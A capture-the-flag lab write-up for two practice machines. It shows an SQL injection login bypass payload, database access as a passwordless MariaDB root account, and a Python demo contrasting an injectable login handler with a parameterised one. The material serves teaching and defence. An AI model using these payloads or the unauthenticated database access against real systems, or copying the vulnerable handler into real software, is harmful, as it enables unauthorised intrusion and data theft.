### Appointment

Given the IP to access the machine, and a bunch of questions to answer:

```
1. What does the acronym SQL stand for? = Structured Query Language
2. What is one of the most common types of SQL vulnerabilities? = SQL injection
3. What does PII stand for? = Personally Identifiable Information
4. What does the OWASP Top 10 list name the classification for this vulnerability? = A03:2021-Injection
5. What service and version are running on port 80 of the target? = Apache httpd 2.4.38 ((Debian))
6. What is the standard port used for the HTTPS protocol? = 443
7. What is one luck-based method of exploiting login pages? = brute-forcing
8. What is a folder called in web-application terminology? = directory
9. What response code is given for "Not Found" errors? = 404
10. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains? = dir
11. What symbol do we use to comment out parts of the code? = #
```

Last Question:

```
Submitting Root Flag
```

So I check port 80 in the browser and there is a login page. I hit it with an SQLi login bypass with the payload `or 1=1 limit 1 #` in the username field, and when I log in I get the flag!

![](https://i.imgur.com/zyLOk1E.png)

---

### Sequel

Starting with a quick scan:

```
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-09 22:23 EAT
Nmap scan report for 10.129.166.120
Host is up (0.21s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 67
|   Capabilities flags: 63486
|   Some Capabilities: InteractiveClient, ConnectWithDatabase, LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, SupportsLoadDataLocal, SupportsTransactions, ODBCClient, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, IgnoreSigpipes, FoundRows, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 2:i%zY0"Xwm<%@Td{^Ct
|_  Auth Plugin Name: mysql_native_password
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 230.82 seconds
```

Now we answer the questions:

```
1. What does the acronym SQL stand for? = Structured Query Language
2. During our scan, which port running mysql do we find? = 3306
3. What community-developed MySQL version is the target running? = MariaDB
4. What switch do we need to use in order to specify a login username for the MySQL service? = -u
5. Which username allows us to log into MariaDB without providing a password? = root
6. What symbol can we use to specify within the query that we want to display everything inside a table? = *
7. What symbol do we need to end each query with? = ;
```

LIST DATABASES AVAILABLE

```
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.16 sec)
```

USE HTB DATABASE

```
mysql> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
```

LIST TABLES AVAILABLE IN THE DB

```
mysql> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (3 min 8.79 sec)
```

READ CONFIG

```
mysql> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.16 sec)
```

FLAG: `7b4bec00d1a39e3dd4e021ec3d915da8`
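Back to the Appointment login bypass: the write-up gives the payload but not what it does to the query. The example below is added here and is not code from the write-up or from the target machine. It assumes the classic vulnerable pattern, a login handler that pastes the username and password into a single-quoted SQL string, so the payload opens with a quote to close the username literal. The `#` comment marker is MariaDB/MySQL syntax; SQLite, which is what runs the example offline, only understands `-- ` comments, so an equivalent SQLite variant of the payload is used for execution and the MySQL form is only rendered as text. The `users` table and its one account are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the target's login database: one account whose
    password the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cr3t!')")
    conn.commit()
    return conn


def build_query(username, password):
    """The statement a naive login handler builds by concatenating user input.
    Returned as text so the effect of the payload on the SQL is visible."""
    return (
        "SELECT id, username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def vulnerable_login(conn, username, password):
    """Executes the concatenated query; returns the matched row or None.
    Deliberately injectable: this is the behaviour the bypass relies on."""
    return conn.execute(build_query(username, password)).fetchone()


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is sent as data, so a quote
    or comment marker in it can never change the statement's structure."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()


# MariaDB/MySQL form (as on the target): '#' comments out the password check.
MYSQL_PAYLOAD = "' or 1=1 limit 1 #"
# SQLite form used for execution here: same structure, '-- ' as the comment marker
# (assumption for portability, SQLite has no '#' comments).
SQLITE_PAYLOAD = "' or 1=1 limit 1 -- "


if __name__ == "__main__":
    conn = make_db()
    # What the MariaDB server would see: WHERE username='' or 1=1 limit 1 #' AND password='...'
    print(build_query(MYSQL_PAYLOAD, "anything"))
    print("vulnerable handler:", vulnerable_login(conn, SQLITE_PAYLOAD, "anything"))
    print("parameterised handler:", safe_login(conn, SQLITE_PAYLOAD, "anything"))
```

The rendered query shows why the three parts of the payload are there: the leading quote ends the username literal, `or 1=1` makes the WHERE clause true for every row, `limit 1` keeps the handler's "exactly one user matched" logic happy, and the comment marker discards the `AND password=...` that follows. The parameterised handler returns nothing for the same input because the whole payload is compared against the username column as a plain string.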